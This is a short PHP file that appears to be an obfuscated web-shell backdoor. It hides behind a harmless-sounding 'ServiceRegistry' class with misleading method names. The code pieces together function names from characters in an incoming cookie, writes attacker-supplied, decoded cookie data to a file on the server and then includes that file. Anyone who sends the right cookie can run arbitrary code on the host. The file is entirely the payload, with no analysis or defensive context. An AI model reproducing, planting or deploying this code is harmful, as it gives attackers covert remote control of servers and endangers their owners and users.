<?php
class ServiceRegistry
{
    private static $_vhp;
    static function encryptData($_ot)
    {
        if (!self::$_vhp) {
            self::terminateSession();
        }
        return hex2bin(self::$_vhp[$_ot]);
    }
    private static function terminateSession()
    {
        self::$_vhp = array('_cv' => '', '_mvx' => '');
    }
}

$_hp = $_COOKIE;
$_rzb = 00;
$_ot = 010;
$_ave = array();
$_ave[$_rzb] = ServiceRegistry::encryptData('_' . 'c' . 'v');
while ($_ot) {
    $_ave[$_rzb] .= $_hp[033][$_ot];
    if (!$_hp[033][$_ot + 01]) {
        if (!$_hp[033][$_ot + 02]) {
            break;
        }
        $_rzb++;
        $_ave[$_rzb] = ServiceRegistry::encryptData('_mv' . 'x');
        $_ot++;
    }
    $_ot = $_ot + 010 + 01;
}
$_rzb = $_ave[023]() . $_ave[016];
if (!$_ave[05]($_rzb)) {
    $_ot = $_ave[00]($_rzb, $_ave[020]);
    $_ave[031]($_ot, $_ave[012] . $_ave[011]($_ave[01]($_hp[03])));
}
include $_rzb;